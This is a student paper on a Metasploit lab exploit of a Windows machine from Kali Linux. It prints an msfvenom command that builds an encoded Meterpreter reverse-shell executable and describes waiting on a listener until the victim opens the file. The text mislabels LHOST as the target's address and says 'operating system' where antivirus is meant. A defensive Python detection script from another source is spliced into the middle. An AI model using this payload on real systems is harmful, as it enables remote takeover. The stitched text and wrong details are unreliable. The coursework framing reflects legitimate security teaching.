Kali Linux Exploit using Metasploit for Windows OS

Added on  2023/06/04

AI Summary
This article explains how to use Kali Linux and Metasploit to exploit the Windows operating system remotely. The article covers the requirements, commands, and steps to execute the exploit. The exploit enables the attacker to get full access to the victim's machine with user rights. The article is relevant to ICT ethical hacking and penetration testing courses.

Running Head: ICT ETHICAL HACKING (EXPLOITS) 1
KALI LINUX EXPLOIT USING METASPLOIT
Student name
Institution Affiliation
Facilitator
Course
Date

The exploit we developed during the workshop targeted machines running Windows
operating systems, and we used the Metasploit framework to achieve that. The approach
was aimed at enabling us to get into the victim's machine with full user rights, just as is the case
when the owner physically logs into the system. The Metasploit framework is defined as a project
that enables development of ID signatures and penetration testing remotely. The tool enabled us
to develop and execute exploit code against a machine running a Windows operating system that was
operating remotely (Dieterle, 2016).
There were various requirements for us to demonstrate how the exploit could be
achieved. These were: two machines under the same NAT network; two different operating
systems (Windows and Linux), installed on the two machines available; and a
Metasploit framework containing all the Ruby packages. This framework was then installed on
the machine running the Kali Linux platform, which would be used as the operating
platform to execute the exploit. Since the presence of an operating system on the target machine
could hinder smooth execution of the exploit, we made sure that no antivirus
software was running on the target machine before we launched the penetration tests (Holik,
Horalek, Marik, Neradova & Zitta, 2014, p. 240). Out of the many commands which could have
been used to facilitate the exploitation, we chose to use the Msfconsole command because of its
supportive features for the tools under the framework as well as its flexibility. The command
provided us with a handy all-in-one interface to all the framework settings.
To penetrate the victim's machine, which was running the Windows
platform, we only needed to know both the machine's IP address and any one of its free port
numbers. Considering that the two machines were operating under the same NAT network,
obtaining these two components was easy using Netcut software.
Using the two specifications (IP address and port number), we then came up with an
executable folder which contained several .exe files, and whose identity keys were the two
components (IP address and port number), to be sent to the targeted machine over any channel
which was available. In our case, we sent the files through the NAT network. We created the
executable file using a Msfconsole command “msfvenom -p windows/meterpreter/reverse_tcp
LHOST=(IP address of windows machine) LPORT=(PORT in the windows machine) -f exe -e
x86/shikata_ga_nai -i 10 > /root/desktop/(desktop name).exe” (Pritchett & De Smet, 2013).
Immediately after sending the file through the NAT network, we were to set the
Metasploit platform to the state of listening, which operates when Msfconsole is in
handler status (Weidman, 2014). The command used for this operation was the “exploit”
command. In the listening state, the Metasploit framework waited until the user of the targeted
machine opened the file which had been sent; this activated the “meterpreter” option, which enabled
us to get full access to the victim's machine.
In addition to having gotten into this machine remotely, we had all the user rights, just
like a person who had physically logged into the machine. Some of the rights we could enjoy at
that juncture were: changing directories, uploading files, removing directories, navigating
through the files, deleting files, printing local directories as well as working directories, and
reading file contents located anywhere in the computer system (Muniz, 2013). The ability to
carry out all the above activities without physically logging into the victim's computer was an
indication that we had exploited this machine remotely.
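
From the defender's side, the sequence described above (a user opens a delivered executable, which then connects back to a waiting listener) leaves a process-start event followed within seconds by an outbound connection. The following added example, which is not part of the original paper, correlates the two over constructed Sysmon-style records; the field names, paths, addresses, port list and 30-second window are all assumptions.

```python
from datetime import datetime, timedelta
from ipaddress import ip_address

# Constructed sample events, loosely modelled on Sysmon process-create (1)
# and network-connect (3) records; users, paths and addresses are made up.
EVENTS = [
    {"id": 1, "time": "2023-06-04T10:00:00", "pid": 4120,
     "image": r"C:\Users\alice\Desktop\invoice.exe"},
    {"id": 3, "time": "2023-06-04T10:00:02", "pid": 4120,
     "dst_ip": "10.0.2.15", "dst_port": 4444},
    {"id": 1, "time": "2023-06-04T10:05:00", "pid": 5000,
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe"},
    {"id": 3, "time": "2023-06-04T10:05:01", "pid": 5000,
     "dst_ip": "93.184.216.34", "dst_port": 443},
    {"id": 1, "time": "2023-06-04T10:10:00", "pid": 6001,
     "image": r"C:\Users\alice\Downloads\setup.exe"},
    {"id": 3, "time": "2023-06-04T10:25:00", "pid": 6001,
     "dst_ip": "10.0.2.20", "dst_port": 8080},
]

USER_WRITABLE = ("\\desktop\\", "\\downloads\\", "\\appdata\\local\\temp\\")
COMMON_PORTS = {53, 80, 123, 443}   # assumed allow-list of expected ports
WINDOW = timedelta(seconds=30)      # assumed "right after launch" threshold

def find_callbacks(events):
    """Flag binaries started from user-writable paths that call out at once."""
    started = {}   # pid -> (start time, image) for suspicious launch locations
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        if ev["id"] == 1:
            image = ev["image"].lower()
            if any(part in image for part in USER_WRITABLE):
                started[ev["pid"]] = (when, ev["image"])
            else:
                started.pop(ev["pid"], None)   # pid reused by a trusted path
        elif ev["id"] == 3 and ev["pid"] in started:
            start, image = started[ev["pid"]]
            if when - start <= WINDOW and ev["dst_port"] not in COMMON_PORTS:
                alerts.append({"image": image, "dst": ev["dst_ip"],
                               "port": ev["dst_port"],
                               "internal": ip_address(ev["dst_ip"]).is_private})
    return alerts

if __name__ == "__main__":
    for alert in find_callbacks(EVENTS):
        print(alert)
```

The `internal` flag matters for the lab setup in this paper: both machines sat on the same NAT network, so the callback target is a private address that perimeter-only monitoring would never see.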
References
Dieterle, D. W. (2016). Basic Security Testing with Kali Linux. CreateSpace Independent
Publishing Platform.
Holik, F., Horalek, J., Marik, O., Neradova, S., & Zitta, S. (2014, November). Effective
penetration testing with Metasploit framework and methodologies. In Computational
Intelligence and Informatics (CINTI), 2014 IEEE 15th International Symposium on (pp.
237-242). IEEE.
Muniz, J. (2013). Web Penetration Testing with Kali Linux. Packt Publishing Ltd.
Pritchett, W. L., & De Smet, D. (2013). Kali Linux Cookbook. Packt Publishing Ltd.
Weidman, G. (2014). Penetration testing: a hands-on introduction to hacking. No Starch Press.